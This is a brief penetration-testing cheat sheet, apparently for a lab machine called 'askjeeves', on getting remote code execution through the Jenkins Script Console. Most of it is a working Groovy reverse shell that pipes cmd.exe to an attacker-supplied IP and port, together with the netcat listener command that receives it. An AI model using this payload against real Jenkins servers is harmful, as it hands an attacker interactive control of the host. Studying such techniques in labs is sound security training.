Jenkins / askjeeves

If you look at Jenkins, check Manage Jenkins page and script console. This is the most likely the way you can execute RCE to the target system.

Look for 'Manage Jenkins' by admin.

Look for Script Console in 'Manage Jenkins'.

Reverse shell

kali> rlwrap nc -nlvp 4444 

# Add teh following to the Script Console field above. 
# Change the IP address and port number 
String host="x.x.x.x";
int port=4444;
String cmd="cmd.exe";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Last updated